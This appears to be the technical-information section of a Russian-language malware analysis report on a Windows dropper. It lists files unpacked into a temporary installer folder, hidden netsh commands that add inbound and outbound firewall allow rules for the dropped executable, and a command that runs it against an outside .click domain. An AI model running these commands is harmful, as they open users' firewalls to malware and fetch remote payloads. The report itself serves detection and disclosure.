Техническая информация
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvrbshzw dir=in action=allow program="%TEMP%\nsn9F3C.tmp\tvrbshzw.exe" enable=yes profile=public,private
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvrbshzw dir=out action=allow program="%TEMP%\nsn9F3C.tmp\tvrbshzw.exe" enable=yes profile=public,private
- %WINDIR%\syswow64\explorer.exe
- %TEMP%\nsn9f3c.tmp\nsexec.dll
- %TEMP%\nsn9f3c.tmp\basiccalculator1.exe
- %TEMP%\nsn9f3c.tmp\greenshot-installer-1.2.10.6-release.exe
- %TEMP%\nsn9f3c.tmp\tvrbshzw.exe
- %TEMP%\nsn9f3c.tmp\tvrbshzw.exe.config
- %TEMP%\nsn9f3c.tmp\selfdel.dll
- %TEMP%\nsn9f3c.tmp\basiccalculator1.exe
- %TEMP%\nsn9f3c.tmp\greenshot-installer-1.2.10.6-release.exe
- %TEMP%\nsn9f3c.tmp\nsexec.dll
- %TEMP%\nsn9f3c.tmp\selfdel.dll
- %TEMP%\nsn9f3c.tmp\tvrbshzw.exe
- %TEMP%\nsn9f3c.tmp\tvrbshzw.exe.config
- '%TEMP%\nsn9f3c.tmp\tvrbshzw.exe' "http://www.dwaynesuzman.click" "%TEMP%\nsn9F3C.tmp\2221"
- '%WINDIR%\syswow64\explorer.exe'
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvrbshzw dir=out action=allow program="%TEMP%\nsn9F3C.tmp\tvrbshzw.exe" enable=yes profile=public,private (со скрытым окном)
- '%WINDIR%\syswow64\netsh.exe' advfirewall firewall add rule name=tvrbshzw dir=in action=allow program="%TEMP%\nsn9F3C.tmp\tvrbshzw.exe" enable=yes profile=public,private (со скрытым окном)